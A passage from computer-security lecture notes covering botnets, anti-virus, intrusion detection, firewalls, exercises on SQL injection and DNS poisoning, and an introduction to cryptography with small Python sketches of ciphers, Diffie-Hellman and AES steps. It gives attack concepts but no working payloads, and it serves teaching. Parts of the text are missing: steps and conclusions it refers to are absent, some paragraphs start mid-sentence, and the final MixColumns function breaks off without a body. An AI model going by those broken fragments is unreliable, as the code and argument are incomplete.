modities that are traded on the black market. One thus does not even have
to create one’s own malware or botnet; it is possible to buy or rent infected
machines. (See for example Metasploit www.metasploit.com for hacking made
easy.) Botnets are controlled through command and control centers. By using a
C&C center to drive a botnet, the malware can easily be updated and adapted,
making it hard to take down the network of bots. To prevent the C&C cen-
ter itself from being taken down, it is located in countries where there are no
laws to easily do this, its location is hidden e.g. within a list of addresses, using
anonymous services in TOR3 and/or redundancy is used so a new C&C can
easily be created at a different location. As in many security areas there is an
arms race between taking out botnet C&C centers and new infections, botnets
and control methods appearing.
Of course with all the value a botnet represents there are those that will try
to take it over, either to dismantle/study it (e.g. [24]) or to use it for their own
illegitimate agenda. It has also been suggested to take this defense strategy a
step further; use weaknesses in infected machine to force installation of patches,
removing of and protecting against malware but there are many moral, legal,
practical and technical issues with such an approach. Related to this is use
of ‘hacking’ by authorities which is also the subject of debate what actions are
justified, should e.g. ‘hacking’ by the police be allowed (and if so to what degree,
3 www.torproject.org
(See also the project at security1.win.tue.nl/spyspot/.)
8.3 Defending Against Network Security Threats
The AC matrix tries to simply list all allowed (‘good’) cases. As we have seen
this quickly becomes unmanageable, thus prompting the introduction of more
advanced specification methods such as RBAC and XACML. In other settings
there are simply way too many possibilities to create a simple list. We thus
need to express a model for ‘good’ or ‘bad’ in a more efficient way. For example,
input filtering against SQL injection is a form of blacklisting where we use a set
of rules, for example, “the ’ symbol is not allowed in a user input used to construct
an SQL query” (or we replace the offending character with a safe encoding).
Anti virus Anti virus software tries to identify malware and prevent it from
causing harm. It typically does so by periodically scanning the whole system, by
checking content as it comes in (e.g. downloads in the browser, incoming email)
and by scanning on access; programs get scanned on the fly as they are started. It recognizes
malware in different ways; signature based recognition compares the scanned
content against a list of known viruses. This requires constant updating of the
list of ‘fingerprints’ of known viruses. Viruses not on the list yet will be missed.
Also variations of the same virus may be missed if the characteristic fingerprint
is changed or masked.
The number of viruses is huge and growing quickly. Though anti-virus software
uses several mechanisms to reduce the performance cost, such as checking for
changes (storing e.g. a CRC of a scanned program) and not rechecking
unchanged programs, purely signature based detection becomes infeasible.
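The ‘only rescan what changed’ idea can be sketched as follows (our own minimal Python illustration, using a SHA-256 hash of the file contents instead of a CRC):

import hashlib

scanned = {}   # path -> hash of the file contents at the time of the last scan

def needs_rescan(path):
    with open(path, "rb") as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    if scanned.get(path) == digest:
        return False          # unchanged since the last (clean) scan
    scanned[path] = digest    # remember the new contents
    return True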
Heuristic recognition tries to recognize malware for example by running the
program in isolation (i.e. a ‘sandbox’) to examine its behaviour or decompiling
to look whether the code contains characteristic malware patterns. It is not
possible in general to decide whether content is ‘malicious’; thus we can only
approximate, making mistakes and mislabeling some content.
These are all clearly signature/rule based blacklisting approaches; they try to
track and recognize the ‘bad’ cases. There is some problem with false positives;
some legitimate programs will match a signature or heuristic rule. The false
negative problem, however, is much bigger; previously unknown malware cannot
be detected. This is a general issue for techniques using signature or rule based
models; they cannot deal with new cases which were not considered when the
signatures/rules were made.
There are also whitelisting approaches that try to combat malware. For
example, Windows will normally only install device drivers that are digitally
signed. This is thus a rule based whitelist; “accept only those drivers that
are signed by the correct authority”. The authority is trusted to check that
the code is not malicious. Reputation based systems look at how long the
program has been around, how often it is used, and where and in which context,
based on feedback from millions of machines (note the potential privacy risk). Here
the community at large instead of a single authority is used as a source of trust
in the program.
IDS Malware will often use the network to spread or otherwise execute ma-
licious activities (for example botnet activities such as sending loads of spam
mail). Intrusion detection systems (IDS) monitor the network to find (and possi-
bly block) malicious activities. IDS systems come in two main classes; signature
and anomaly based. As mentioned, signature based systems check for patterns
in the traffic that match known attacks. Anomaly based systems look for ‘ab-
normal’ behavior; anything that is not the usual behavior on the network could
indicate an attack. These classes thus have the same drawbacks as observed for
virus scanners.
Not all attacks can be detected and not all detected anomalies (or signature
matches) are attacks. A way to measure the quality of an IDS is to look at
its false negative rate (missed malicious traffic) versus its false positive (false
alarm) rate. Perfect detection with no false negatives and no false positives is
impossible. Instead we are left with a trade-off between the detection rate and the
amount of (false) alarms that are raised and need to be dealt with by the security
officer.
Signature based systems have a high false negative rate on new attacks while
anomaly based systems will suffer from false positives.
In signature based systems the trade-off is set by how ‘wide’ the rules are
(with ‘everything is an attack’ as an extreme). With anomaly based systems it
is set by choosing a threshold on how uncommon an activity has to be to be
called an anomaly (such as ‘traffic to addresses that occurred in less than t percent
of the cases during training is anomalous’).
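A threshold-based anomaly detector of this kind could be sketched as follows (a toy Python illustration; ‘activity’ is reduced to the destination address of a connection and the threshold t is a percentage chosen by the operator):

from collections import Counter

def train(destinations):
    # Record how often each destination occurred in the (benign) training traffic.
    counts = Counter(destinations)
    total = sum(counts.values())
    return {dest: 100.0 * n / total for dest, n in counts.items()}

def is_anomalous(dest, profile, t=1.0):
    # Anomalous if the destination occurred in less than t percent of the
    # training traffic (unseen destinations count as 0 percent).
    return profile.get(dest, 0.0) < t

profile = train(["10.0.0.5"] * 95 + ["10.0.0.7"] * 5)
print(is_anomalous("10.0.0.7", profile, t=1.0))     # False: seen in 5% of traffic
print(is_anomalous("203.0.113.9", profile, t=1.0))  # True: never seen in training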
Firewalls Another line of defense is to control which traffic can enter or leave
(a part) of the network. Firewalls do exactly this by filtering the traffic between two
networks, e.g. an organization’s LAN and the Internet, an organization’s web
services and its intranet, a single PC and the intranet, etc.
Filtering can happen at different layers of abstraction (and thus at different
network layers). For example a basic packet filtering firewall (working at the
network layer) can help against IP spoofing of local addresses by outside attack-
ers and can block access to ports (and services) that should not be accessible.
If working at the TCP level, it will likely need to remember which sessions are
open to be able to distinguish real responses from spoofed messages; a state-
ful firewall. Increased filter complexity can have a significant impact on the
resources needed and thus the performance of the firewall. Going up to the
application layer one can try to block dangerous data or known threats; such
as removing active components from web pages and macros from word documents,
blocking downloaded files containing viruses, tagging spam and phishing emails, etc.
Of course this greatly increases the complexity of the firewall; instead of looking
at single packets one needs to understand the protocol being used, extract and
reconstruct the data being sent, interpret and evaluate the data to determine
whether it is harmful.
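As an illustration, a (greatly simplified) packet filtering rule set of the kind described at the start of this paragraph could look as follows in Python; the address range, ports and rules are invented for the example:

import ipaddress

LOCAL_NET = ipaddress.ip_network("192.168.0.0/16")   # illustrative internal range
OPEN_PORTS = {80, 443}                               # only the public web services

def allow_inbound(src_ip, dst_port):
    # Drop packets from outside that claim a local (spoofed) source address.
    if ipaddress.ip_address(src_ip) in LOCAL_NET:
        return False
    # Drop traffic to ports that should not be reachable from the outside.
    return dst_port in OPEN_PORTS

print(allow_inbound("192.168.1.10", 80))   # False: spoofed local source
print(allow_inbound("198.51.100.7", 22))   # False: SSH not exposed
print(allow_inbound("198.51.100.7", 443))  # True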
A main difference between firewalls and intrusion detection systems is that
the former actually blocks traffic considered to be malicious. With an IDS the
operator still needs to respond to deal with the attack (for example by defining
a new firewall rule). The use of firewalls thus has a direct impact on availability
and usability; if we block traffic then availability and usability will go down.
For example, by blocking port 22 of all machines except the public SSH server
you help protect the network (e.g. a mis-configured machine vulnerable on port
22 would not be accessible from the outside) but also disallow other computers
on the network from offering SSH connections. Also, the firewall will impact
network performance with more advanced filtering requiring more effort thus
adding to cost and/or leading to further loss of performance.
A good policy (a model of ‘good’ and/or ‘bad’ traffic) is thus needed to
make firewalls useful; one that implements optimal trade-offs between protect-
ing against network risks and keeping network services available. The risks,
ways to detect attacks and network services needed change dynamically, mak-
ing maintaining an effective firewall challenging.
The use of anomaly based approaches is uncommon when actually blocking
traffic; not only is there the risk of a high false positive rate but also the reason
why a particular message did not arrive might become unclear. Knowing a set of
rules for the firewall a user can understand why certain connections do not work
and what to change in the rules to make them work. However, understanding a
machine-learned model of traffic used for anomaly detection, let alone updating
it, is a lot more difficult.
Note that the firewall can only inspect the traffic that it can see. If data is
encrypted (a best practice for securing a connection) this limits the possibilities
for the firewall.
Summarizing, a firewall is a very useful tool and is employed by nearly anyone
operating a network. Firewalls are even built into operating systems to protect
the (network consisting of only the) PC from the network it is connected to.
Still, given its inherent limitations it is by itself not sufficient to protect a local
network. Thus it is typically combined with IDS to find threats on the local
network and anti-virus on the end-points; the machines on the network.
8.4 Summary
In this chapter we have looked at Network security and Web service security.
We first looked at threats at the different network layers and specifically ap-
plication layer threats for web servers. We then discussed firewalls, which try to
keep attackers from entering the local network, intrusion detection systems, which
find attackers that managed to enter the local network, and anti-virus solutions,
which protect against attacks that manage to reach the end-points. We identified
black/white listing and signature/anomaly based models as methods used by these
approaches to classify traffic/content into normal and malicious.
8.4.1 Literature
Suggested reading
• Sections 8.6-8.10 of the book Computer Networking: A Top-Down Ap-
proach [20, Sec. 8.6-8.10],
• Hunting the Unknown, White-Box Database Leakage Detection [12].
4. Once again consider the online music store scenario of Exercise 6 in Chap-
ter 1. Enhance the requirements you extracted and security design that
you made by considering threats and techniques introduced in this chap-
ter. Indicate how you would apply the techniques, what trade-offs this
imposes and what effect they have on both the attacks as well as on the
goals of the legitimate actors in the system, and, if applicable what new
goals/actors you need to introduce.
5. Figure 8.1 shows several example attacks and their place in the OSI stack.
No example is given of an attack related to the translation between trans-
port and network layer. Give a threat that you would consider to fit in
this location.
6. Assume the script in Figure 8.11 is used on a website. What input could
an attacker give (in the username and password fields) to:
(a) login as user Alice.
(b) test a guess (e.g. MyPassword) for Alice’s password.
(c) test whether Alice’s password starts with M.
7. Consider the DNS poisoning attack against a local name server.
(a) What is the attacker model; which implicit assumptions are made
and why?
(b) The attacker needs to get the guessed ID to match one of the IDs
of one of the outgoing requests. Each ID is a (uniformly) randomly
chosen 16-bit number. Suppose the attacker sends the same number
of fake answers as there are requests. How many requests do there
need to be for the attacker to have at least a 50% chance of succeed-
ing? (Hint: consider the chance that none of the fake answers matches
any of the requests.)
8. The quality of an anomaly based IDS (or more generally the performance
of any binary classifier) can be shown with a so called “Receiver operating
characteristic (ROC) curve” which plots the false positive rate (false alerts)
against the true positive (detection) rate (true alerts; equal to 1 - false
negative rate). (Recall that setting a different threshold results in a different
trade-off between these two numbers.)
(a) Draw a ROC curve with four classifiers: the first does random guess-
ing, the second achieves a detection rate of 80% at the cost of a 40%
false positive rate, the third a detection rate of 90% at the cost of a 30%
false positive rate, and finally a perfect classifier.
(b) Assume we have a classifier that is below the line of random
guessing. How could we make a better classifier out of this?
Chapter 9
Cryptography
Cryptography is one of the main building blocks available to the network security
engineer. In this chapter we describe the basics of cryptography, the design and
building of ciphers, as well as cryptanalysis, the analysis and breaking of ciphers.
Together these are referred to as cryptology.
This chapter first discusses the security goals that one may want to achieve
with cryptography and then treats the two main classes of cryptography: Sym-
metric and Public Key (also known as Asymmetric) Cryptography.
In our discussion we try to answer the following questions:
• How to defend against different attacker models using crypto?
• How to encrypt and decrypt large messages?
– As encryption algorithms typically have a size limit on the messages
that they encrypt, we discuss how to encrypt larger messages by
splitting them into multiple blocks.
• What does it mean to say “a cipher is secure”?
Keeping a small piece of input information (the key) secret should be sufficient;
the algorithm itself need not be secret. Note that this is an instance of the more
general ‘not relying on security through obscurity’ principle.
Figure 9.1 shows the basic operation of a cryptography system; an encryp-
tion system protects a message by creating a jumbled version of the message
using a known method (the encryption algorithm) and a small piece of secret
information (the encryption key). With a corresponding secret (the decryption
key) and another known method (the decryption algorithm) the secret message
can be recovered. Trying to use the decryption method without knowing the
correct key provides no information about the secret message.
Encrypting data thus aims to protect its confidentiality. There are also
cryptographic techniques such as digital signatures (see also Section 9.3), which
allow checking integrity. Authenticity and providing non-repudiation can also
be achieved using encryption schemes.
Several privacy enhancing techniques use techniques similar to asymmet-
ric cryptography and, indirectly through confidentiality, cryptography can con-
tribute to privacy. However, privacy is typically not a direct goal of cryptog-
raphy; your data is under the control of other entities, and privacy requirements
restrict what those entities may do with the data, not their ability to get to the
data.
Encryption clearly has a negative impact on availability. Decryption aims
to maintain availability in the presence of encryption, of course only for those
with the correct decryption keys. Thus confidentiality and availability can be
combined by ensuring that only the correct parties have the relevant decryption
keys (recall the discussion on security requirements from the first chapter).
A cipher is called unconditionally secure (or information-theoretically secure) if
encryption with a random key gives a cipher text that is not correlated with the
plaintext.
Formally, consider the random variable k (the randomly selected key). We re-
quire that for any cipher text c and potential plaintexts p1, p2:
P(c = Enc_k(p1)) = P(c = Enc_k(p2)),
where P denotes the probability. That is, if one does not know the key each
plaintext is equally likely to have been the one that was encrypted.
An alternative, equivalent, definition is that for any probability distribution
over plaintexts (the attacker’s a-priori estimate of how likely a given plaintext
is) the attacker learns nothing new by obtaining the cipher text; the conditional
probability of each plaintext given an encryption with a random key is the same
as in the original distribution over plaintexts.
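As a small worked example (ours, not from the notes), consider encrypting a single bit p with a uniformly random key bit k, giving cipher text c = p ⊕ k:
\[ P(c=0 \mid p=0) = P(k=0) = \tfrac{1}{2} = P(k=1) = P(c=0 \mid p=1), \]
so the cipher text has the same distribution whatever the plaintext is, and by Bayes' rule the attacker's a-posteriori distribution equals the a-priori one:
\[ P(p \mid c) = \frac{P(c \mid p)\,P(p)}{P(c)} = \frac{\tfrac{1}{2}\,P(p)}{\tfrac{1}{2}} = P(p). \]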
Recall from Chapter 1 that a notion of ‘secure’ should consider both the goal
to be reached (a security policy in terms of security attributes to be achieved)
and under which conditions/situations this goal must be achieved (the attacker
model). We can summarize these as follows: the term ‘unconditionally secure’
cipher refers to the security goal ‘confidentiality of the plaintext’ with security
policy ‘those who do not know the randomly generated key may not learn any-
thing about the plaintext’. The attacker is one with unlimited computational
resources who knows (Kerckhoffs’ principle) the cipher, including the probability
distribution of the keys (because the attacker knows the key generation algorithm),
but does not know the actual key (the outcomes of the random choices in the key
generation algorithm are not known).
Unconditional security imposes a very strong requirement on the cipher. Is it
actually possible to create a cipher which achieves this? This is indeed possible
(assuming the number of possible plaintexts is finite) and can be achieved by a
surprisingly simple system; the one-time pad.
plaintext bits p1 p2 p3 p4 p5 …
key bits k1 k2 k3 k4 k5 …
cipher text bits p1 ⊕ k1 p2 ⊕ k2 p3 ⊕ k3 p4 ⊕ k4 p5 ⊕ k5 …
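As a minimal sketch in code (ours; the function names are not from the notes), encryption and decryption of the one-time pad are the same XOR operation, and the key must be a fresh, truly random string as long as the message:

import secrets

def otp_encrypt(plaintext: bytes, key: bytes) -> bytes:
    # XOR every plaintext byte with the corresponding key byte.
    assert len(key) == len(plaintext), "the pad must be as long as the message"
    return bytes(p ^ k for p, k in zip(plaintext, key))

# Decryption is the same operation, since (p XOR k) XOR k = p.
otp_decrypt = otp_encrypt

message = b"HELLO"
key = secrets.token_bytes(len(message))   # fresh random pad, used only once
cipher = otp_encrypt(message, key)
assert otp_decrypt(cipher, key) == message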
Similarly if we use the one time pad for securely storing (rather than sending)
some data we would need to securely store a key of equal length. Here the only
remaining benefit is that an attacker would have to obtain both the key and
encrypted data, which we could try to make difficult e.g. by storing them in
different places. This is a form of so called secret sharing.
So the one time pad is secure2 but needs impractically long keys. Could we
not think of a more efficient system which achieves the same level of security?
Unfortunately, such a system cannot exist (see Exercise 9). Thus people have
been trying to create practical encryption systems which are ‘good enough’.
Below we look at some of these attempts.
Substitution Ciphers The Caesar cipher which, as its name suggests, was
already used in Roman times, is a simple substitution cipher. Given a plaintext
we simply shift each letter by a fixed number of places (e.g. A becomes D, B
becomes E etc.) to obtain the cipher text. To decrypt we shift back by the
same number of places.
plaintext letters H E L L O …
key letter (repeats) C C C C C …
cipher text letters K H O O R …
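A small sketch in code (ours) of the Caesar cipher and of a brute-force attack over its tiny key space; here the key is simply the shift amount, so the key letter C in the table above corresponds to a shift of 3:

import string

ALPHABET = string.ascii_uppercase  # 'A'..'Z'

def caesar(text: str, shift: int) -> str:
    # Shift every letter by 'shift' places; other characters are kept as-is.
    return "".join(
        ALPHABET[(ALPHABET.index(c) + shift) % 26] if c in ALPHABET else c
        for c in text.upper()
    )

cipher = caesar("HELLO", 3)   # gives 'KHOOR', as in the table above
plain = caesar(cipher, -3)    # decrypt by shifting back

# Brute force: there are only 26 candidate keys, so simply try them all
# and look for the shift that produces readable text.
for k in range(26):
    print(k, caesar(cipher, -k))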
It is clear that this cipher does not offer much security; there are only 26
possible key values (of which one is not really useful; consider which one and
why) so we can only hope for log_2(26) (i.e. less than 5) bits of security at best.
Conclusion 1: We need a sufficiently large key space.
However, the Caesar cipher can be broken even more easily. The patterns
in the text remain unaltered (e.g. in Figure 9.5 the double L becomes a double
O), allowing knowledge of text patterns to be used to easily find the key. For
example, by looking at the frequency of the letters one can conclude which cipher
text letter is most likely the encryption of the letter E, which also directly gives
the key used.
The Caesar cipher uses a very structured (linear) operation to encode let-
ters; a rotation in which each letter moves by the same amount. Instead, as
substitution we could use an arbitrary 1-to-1 mapping from letters to letters
(also called a bijection or permutation) where e.g. A could be encoded as E, B
as Z, C as P, etc. The key is then the mapping itself, which we could store as a
sequence of 26 letters (EZP...). The number of possible keys is now 26!, or
approximately 2^88 possibilities, which corresponds to 88 bits. This may seem a
reassuring number as trying all keys, say at a million billion tries per second,
would still take thousands of years. Yet breaking such a cipher can be done,
even by hand, by looking at patterns in the text rather than trying all possible
keys (there is actually a type of puzzle based on this idea; in a filled in crossword
each letter is replaced by a number and the goal is to find the corresponding
mapping between numbers and letters). Conclusion 2: The non-linearity of the
substitution is a strength but not sufficient when working with single letters.
Also storage requirements for keys need to be considered.
2 What did that mean again in this setting ...
Vigenère Cipher The Vigenère cipher uses a key word of n letters rather than
a single key letter; each plaintext letter is shifted according to the corresponding
key letter, with the key word repeated as often as needed:
plaintext letters H E L L O …
key word (repeats) B Y E B Y …
cipher text letters J D Q N N …
With a block size of n letters the size of the key space becomes 26^n. However,
again an attacker can mount a more effective attack than just trying all possible
keys: first the attacker guesses the length of the key, n. This guess can be verified
e.g. by checking that the frequencies of every n-th letter show the same pattern
as the frequencies normally occurring in a text, or simply by the fact that the
next step succeeds. Finding the key is then an easy exercise of attacking a
Caesar cipher n times.
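A sketch in code (ours) of this cipher and of the attack just described: guess the key length n and split the cipher text into n interleaved Caesar ciphers, each of which can be attacked by letter frequencies. To reproduce the table above, the shift for a key letter is taken to be its position in the alphabet counting from A = 1:

import string
from collections import Counter

ALPHABET = string.ascii_uppercase

def vigenere_encrypt(text: str, keyword: str) -> str:
    # Shift letter i by the alphabet position (A=1, ..., Z=26) of key letter i mod n.
    out = []
    for i, c in enumerate(text.upper()):
        shift = ALPHABET.index(keyword[i % len(keyword)].upper()) + 1
        out.append(ALPHABET[(ALPHABET.index(c) + shift) % 26])
    return "".join(out)

assert vigenere_encrypt("HELLO", "BYE") == "JDQNN"   # matches the table above

def split_streams(cipher: str, n: int) -> list:
    # Every n-th letter was shifted by the same key letter: n separate Caesar ciphers.
    return [cipher[i::n] for i in range(n)]

# For a guessed key length n, each stream can be attacked by letter frequency,
# e.g. assuming the most common letter in a long English text encrypts 'E'.
for stream in split_streams(vigenere_encrypt("HELLOHELLOHELLO", "BYE"), 3):
    print(Counter(stream).most_common(1))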
Thus simply increasing the block size does not, by itself, solve the problem.
When our message is larger than the block size the repetitions still allow recogni-
tion of patterns. (What if our message is not longer than the block size and we
only send one message so no repetitions occur?3 ) Conclusion 3: Just increasing
the block size helps too little if the attacker can solve the problem one part at
a time.
From the conclusions above a natural goal would be to combine larger block
sizes with non-linear operations. Note, however, that a random 1-to-1 function
of the entire block (for example with block size 3 a mapping could be: AAA
maps to EQN, AAB maps to XPA, ..., ZZZ maps to SDI), while hard to break,
would give prohibitively large keys (the list EQN, XPA, ..., SDI is over 50K letters
long). Conclusion 4: We would like to have a random 1-to-1 mapping without
needing to store all its outputs. We could try to simulate this by not really
using a random function but one that we can compute based on a small piece
of random data that then is our key. Of course the output should look random;
it should not depend on the input or the key in an easy to detect way (such as
a linear relation). Modern block ciphers use this principle but before we can
describe those we need one more ingredient.
Modern Block Ciphers From the discussion above we can conclude that we
want to:
• have sufficiently large keys (Conclusion 1) but not too large (Conclusion 2).
If the best an attacker can do is to try all keys then 128 or 256 bits are
commonly used sizes. The key space grows exponentially in the size of the
key; if everybody in the world had a billion processors each able to try a
billion keys per second it would still take over a thousand years to try 2^128
possibilities, while 2^256 approaches the estimated number of atoms in the
observable universe.
• have output depend on all input (recall Conclusion 3); we don’t want the
attacker to be able to analyse the cipher text one piece at a time. We can
use transposition to help achieve this but by itself it will not be enough
(recall Conclusion 5).
• prevent the attacker from detecting how the output depends on the input
or on the key (recall Conclusion 4).
Step 1 We try to hide the input. We can do this for example by the method
used in the one time pad and in the Vigenère cipher (for letters); we add the
key to the input one bit at a time (that is, we XOR the input and the key).
Note that (so far) an attacker could analyze the result one bit at a time
and the relation of output with input and key is linear. We thus need to
mix the bits and hide this relation in the next steps.
Step 3: Diffusion (Permutation) Mix the bits by moving them around (per-
mutation) and possibly doing a (linear) combination. By moving the bits
we try to hide how output bits depend on input bits so the attacker will
not know which bits belong to which byte.
Thus each bit in turn depends on a byte (due to step 2 in round 1) of the input and
the key. By repeating steps 1-3 several times (rounds) we ensure the attacker
will have to analyze the whole block at once and in a non-trivial way (due to
the included non-linear steps).
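The following toy substitution-permutation cipher on a 16-bit block (entirely our own construction, with an arbitrary invertible 4-bit S-box and bit permutation, and far too small to be secure) only illustrates this round structure: XOR in key material, substitute small pieces non-linearly, then permute the bits.

# Toy substitution-permutation rounds on a 16-bit block (illustration only).
SBOX = [0xE, 0x4, 0xD, 0x1, 0x2, 0xF, 0xB, 0x8,
        0x3, 0xA, 0x6, 0xC, 0x5, 0x9, 0x0, 0x7]   # example 4-bit S-box (non-linear step)
PERM = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]  # bit permutation

def substitute(block: int) -> int:
    # Apply the 4-bit S-box to each of the four nibbles of the block.
    out = 0
    for i in range(4):
        nibble = (block >> (4 * i)) & 0xF
        out |= SBOX[nibble] << (4 * i)
    return out

def permute(block: int) -> int:
    # Move bit i of the input to position PERM[i] of the output (diffusion).
    out = 0
    for i in range(16):
        if (block >> i) & 1:
            out |= 1 << PERM[i]
    return out

def encrypt(block: int, round_keys: list) -> int:
    for rk in round_keys:
        block ^= rk                 # step 1: hide the input by XORing in key material
        block = substitute(block)   # step 2: non-linear substitution per nibble
        block = permute(block)      # step 3: diffusion by moving the bits around
    return block

print(hex(encrypt(0x1234, [0xA5A5, 0x0F0F, 0x3C3C, 0xFFFF])))

After a few such rounds every output bit depends on every input and key bit in a non-trivial way.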
The above sketches the main idea of many of the modern block ciphers
(substitution-permutation ciphers). Each uses repeated rounds applying confu-
sion and diffusion, though they differ in the order of the steps and in how they
mix the key with the input. Shuffling key bits between rounds, resulting in
different ‘round keys’, is also common. In Section 9.5 we will see two examples of
this in some more detail; the Data Encryption Standard and its successor, the
Advanced Encryption Standard. Now we first move to the basics of asymmetric
(a.k.a. public key) cryptography.
Diffie-Hellman Key Exchange Consider the following setup: Alice and Bob
want to create a shared key, e.g. to be able to use a symmetric cipher, but are
worried that someone may overhear their communication. Diffie-Hellman Key
Exchange could be used to solve this. In this system two public parameters
are set: a large prime number p and a generator a < p. Alice and Bob both
generate a random number, x and y respectively, raise a to the power of this
random number and send this to the other. Each raises the number r they
receive to the power of their own random number; the result is the shared
secret key, so Alice and Bob share the same key:
Alice uses
r_bob^x mod p = (a^y mod p)^x mod p = a^(yx) mod p,
and Bob uses
r_alice^y mod p = (a^x mod p)^y mod p = a^(xy) mod p.
An eavesdropper could obtain r_alice and r_bob. However, to make the key from
e.g. r_alice one would need y. The attacker could try to obtain y from r_bob because
r_bob = a^y mod p, in which only y is unknown. However, this is an instance
of solving a discrete logarithm problem in a finite group, for which no efficient
algorithms are known. Thus if we use a large prime number p an eavesdropper
is highly unlikely to obtain the shared secret key.
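A small numeric sketch (ours) of the exchange using Python's built-in modular exponentiation; the prime used here is far too small for real use, where p is much larger and standardized:

import secrets

# Public parameters (toy sizes).
p = 2**127 - 1   # a prime (Mersenne); real deployments use much larger primes
a = 5            # public base

# Each party picks a private exponent and publishes a^exponent mod p.
x = secrets.randbelow(p - 2) + 1   # Alice's secret
y = secrets.randbelow(p - 2) + 1   # Bob's secret
r_alice = pow(a, x, p)             # sent by Alice
r_bob = pow(a, y, p)               # sent by Bob

# Both arrive at the same shared key a^(xy) mod p.
key_alice = pow(r_bob, x, p)
key_bob = pow(r_alice, y, p)
assert key_alice == key_bob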
This is a characteristic property of asymmetric ciphers; the security argu-
ment is that the attacker, even if she knows the public key and the cipher text,
would have to solve a ‘hard problem’ to extract the secret key and/or the plain-
text.
Note that the attacker model is very important for the security of this scheme.
For example, the scheme is not secure against a man in the middle attack. In
the man in the middle attacker model the attacker is able to not only listen to
messages but actually intercept and change them. If Eve can alter messages
sent by Alice and Bob she could replace a^x and a^y by a^(x′) and a^(y′), after which
Alice (computing a^(xy′)) and Bob (computing a^(x′y)) each share a key with Eve
while thinking they share a key with each other.
symmetric key and this key stream is XORed with the plaintext to obtain the
cipher text. Note the similarity with the one-time pad; if the key stream is
‘sufficiently random’ then so is the cipher text. Also, like with the one-time pad,
the same key(stream) should not be reused. With OFB mode, an initialization
vector is encrypted to give the first block of key bits which then also replaces the
initialization vector and is re-encrypted to form the next block of key bits, etc.
(Using a different initialization vector enables one to generate multiple streams
from the same key in OFB mode.) The CFB mode is a slight variation of CBC
with a structure that resembles a stream cipher. In CFB an initialization vector
is encrypted to get the first block of key bits and the resulting cipher text is
then re-encrypted, thus re-seeding the pseudorandom key stream, but here
with data which also depends on the plain text.
Figure 9.9: Overview of Block modes ECB, CBC, CFB and OFB
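To make the chaining concrete, here is a sketch (ours) of the encryption direction of CBC and OFB. The function block_encrypt stands in for a real block cipher such as AES; here it is faked with a hash, which is not invertible, so only encryption is shown:

import hashlib

BLOCK = 16  # block size in bytes

def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Stand-in for a real block cipher (NOT invertible, illustration only).
    return hashlib.sha256(key + block).digest()[:BLOCK]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_encrypt(key: bytes, iv: bytes, blocks: list) -> list:
    # CBC: XOR each plaintext block with the previous cipher block, then encrypt.
    out, prev = [], iv
    for p in blocks:
        c = block_encrypt(key, xor(p, prev))
        out.append(c)
        prev = c
    return out

def ofb_encrypt(key: bytes, iv: bytes, blocks: list) -> list:
    # OFB: repeatedly encrypt the IV to get a key stream, XOR it with the plaintext.
    out, stream = [], iv
    for p in blocks:
        stream = block_encrypt(key, stream)   # next block of key bits
        out.append(xor(p, stream))
    return out

msg = [b"A" * BLOCK, b"A" * BLOCK]   # two identical plaintext blocks
# Unlike ECB, the two cipher blocks differ because of the chaining.
print(cbc_encrypt(b"k" * BLOCK, b"\x00" * BLOCK, msg))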
Figure 9.10: In the Feistel structure a round consists of splitting the input into
two parts, applying a function F to the right hand side and XOR-ing the result
with the left hand side. This gives the new right hand side. The new left hand
side is the old right hand side.
AddRoundKey which XORs the current state with the round key. The round
key is also represented by a 4x4 byte matrix. We do not treat how the
round key is derived from the main key here.
SubBytes which applies an S-box substitution on each byte of the state. The
S-box that is used is given below (in hexadecimal format). Unlike the DES
S-box the AES S-box is invertible. Also, the AES S-box can be expressed
as a combination of several functions, allowing it to be computed rather
than stored, which may be relevant for devices with very limited storage
capability.
| 0 1 2 3 4 5 6 7 8 9 a b c d e f
---|--|--|--|--|--|--|--|--|--|--|--|--|--|--|--|--|
00 |63 7c 77 7b f2 6b 6f c5 30 01 67 2b fe d7 ab 76
10 |ca 82 c9 7d fa 59 47 f0 ad d4 a2 af 9c a4 72 c0
20 |b7 fd 93 26 36 3f f7 cc 34 a5 e5 f1 71 d8 31 15
30 |04 c7 23 c3 18 96 05 9a 07 12 80 e2 eb 27 b2 75
40 |09 83 2c 1a 1b 6e 5a a0 52 3b d6 b3 29 e3 2f 84
50 |53 d1 00 ed 20 fc b1 5b 6a cb be 39 4a 4c 58 cf
60 |d0 ef aa fb 43 4d 33 85 45 f9 02 7f 50 3c 9f a8
70 |51 a3 40 8f 92 9d 38 f5 bc b6 da 21 10 ff f3 d2
80 |cd 0c 13 ec 5f 97 44 17 c4 a7 7e 3d 64 5d 19 73
90 |60 81 4f dc 22 2a 90 88 46 ee b8 14 de 5e 0b db
a0 |e0 32 3a 0a 49 06 24 5c c2 d3 ac 62 91 95 e4 79
b0 |e7 c8 37 6d 8d d5 4e a9 6c 56 f4 ea 65 7a ae 08
c0 |ba 78 25 2e 1c a6 b4 c6 e8 dd 74 1f 4b bd 8b 8a
d0 |70 3e b5 66 48 03 f6 0e 61 35 57 b9 86 c1 1d 9e
e0 |e1 f8 98 11 69 d9 8e 94 9b 1e 87 e9 ce 55 28 df
f0 |8c a1 89 0d bf e6 42 68 41 99 2d 0f b0 54 bb 16
ShiftRows which cyclically shifts the rows of the state; the first row is not
shifted, the second row is rotated 1 place to the left, the third row 2 places
and the fourth row 3 places. As an effect, each column after the shift depends
on every column before the shift.
MixColumns which combines the four bytes in each column to a new column
by multiplying with the following matrix:
| 2 3 1 1 |
| 1 2 3 1 |
| 1 1 2 3 |
| 3 1 1 2 |
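The matrix multiplication is carried out in the AES finite field GF(2^8). A sketch (ours) of this step for a single column, using the standard 'xtime' trick for multiplication by 2; the column used below is a commonly quoted test value:

def xtime(b: int) -> int:
    # Multiply a byte by 2 in GF(2^8), i.e. modulo x^8 + x^4 + x^3 + x + 1.
    b <<= 1
    return (b ^ 0x11B) & 0xFF if b & 0x100 else b

def mul(b: int, factor: int) -> int:
    # Multiply a byte by 1, 2 or 3 in GF(2^8) (the only factors in the matrix).
    if factor == 1:
        return b
    if factor == 2:
        return xtime(b)
    return xtime(b) ^ b   # 3·b = 2·b + b

MIX = [[2, 3, 1, 1],
       [1, 2, 3, 1],
       [1, 1, 2, 3],
       [3, 1, 1, 2]]

def mix_column(col: list) -> list:
    # Multiply one 4-byte column of the state with the MixColumns matrix.
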